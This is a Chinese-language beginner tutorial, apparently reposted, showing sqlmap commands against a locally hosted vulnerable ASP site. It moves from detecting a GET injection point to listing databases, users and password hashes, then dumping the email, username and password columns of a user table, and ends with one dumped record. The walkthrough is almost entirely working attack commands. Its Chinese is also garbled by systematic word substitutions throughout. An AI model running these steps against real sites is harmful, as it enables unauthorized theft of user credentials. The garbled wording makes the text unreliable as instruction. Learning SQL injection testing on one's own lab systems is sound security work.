對付網絡安詳人員來說,把握滲透東西的利用要領是一項必備的技術。然而,一個沒有師傅教育的小白在剛開始進修時,并不知道該如何入手舉辦滲透進修,所以本文旨在輔佐這些小白入門。
sqlmap是一款很是強大的開源sql自動化注入東西,可以用來檢測和操作sql注入裂痕。它由python語言開拓而成,,因此運行需要安裝python情況。
測試情況:當地搭建的具有sql注入點的網站 http://192.168.1.150
留意:sqlmap只是用來檢測和操作sql注入點的,并不能掃描出網站有哪些裂痕,利用前請先利用掃描東西掃出sql注入點。
教程開始:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
參數:
-u:指定注入點url
功效:
注入功效展示:
(1)注入參數id為GET注入,注入范例有四類別離為:boolean-based blind、error-based、stacked queries、inline query。
(2)web處事器系統為windows 2003 or XP
(3)web應用措施技能為:ASP.NET, Microsoft IIS 6.0
(4)數據庫范例為:SQLSERVER 2000
個中圖一有若干詢問語句,需要用戶輸入[Y/N],假如你懶得輸入可能不懂怎么輸入可以讓措施自動輸入,只需添加一個參數即可,呼吁如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
一條呼吁即可曝出該sqlserver中所有數據庫名稱,呼吁如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
參數:
--dbs:dbs前面有兩條杠,請看清楚。
功效:
功效顯示該sqlserver中共包括7個可用的數據庫。
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
參數:
-D:指定命據庫名稱
--tables:列出表
功效:
功效浮現共列出了34張表。
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
參數:
-D:指定命據庫名稱
-T:指定要列出字段的表
--columns:指定列出字段
功效:
功效顯示該userb表中包括了23條字段。
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
參數:
-C :指定要暴的字段
--dump:將功效導出
功效:
假如字段內容太多,需要耗費許多時間。可以指定導出特定范疇的字段內容,呼吁如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
參數:
--start:指定開始的行
--stop:指定竣事的行
此條呼吁的寄義為:導出數據庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數據內容。
功效如下:
通過上圖功效看到個中的一個用戶信息為:
email:[email protected]
username: 1.asp
password: 49ba59abbe56e057